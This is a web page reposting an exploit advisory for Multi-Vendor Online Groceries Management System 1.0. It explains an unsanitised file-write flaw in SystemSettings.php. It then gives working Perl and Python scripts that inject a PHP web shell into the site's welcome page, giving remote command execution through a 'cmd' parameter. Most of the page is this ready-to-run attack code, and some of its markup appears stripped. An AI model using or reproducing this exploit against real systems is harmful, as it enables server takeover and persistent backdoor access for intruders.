Exploit/Advisories no image

Published on April 24th, 2023 📆 | 3331 Views ⚑

0

Multi-Vendor Online Groceries Management System 1.0 Remote Code Execution – Torchsec


https://www.ispeech.org/text.to.speech

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
# Date: 4/23/2023
# Author: Or4nG.M4n
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: windows
#
# Vuln File : SystemSettings.php < here you can inject php code
#     if(isset($_POST['content'])){
#      foreach($_POST['content'] as $k => $v)
#      file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want
#    }
# Vuln File : home.php < here you can include and execute you're php code
#                   
Welcome

#                   

#                   

#                        <=== include 
#                   

# Perl Code 
use LWP::UserAgent;
use LWP::Simple;
print "Target Url #";
my $url = ;
chomp $url;
$backdoor = '"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "

"; die; }?>';
my $ua = LWP::UserAgent->new();
my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );
my $content = $response->decoded_content();
print "[+] injection in welcome page\n";
print "[+] backdoor url ".$url."/?cmd=ls -al";

# Python Code

import requests





url = input("Enter url :")
postdata = {'content[welcome]':'"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "

"; die; }?>'}
resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
print("[+] injection in welcome page")
print("[+]"+url+"/?cmd=ls -al")
print("\n")

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑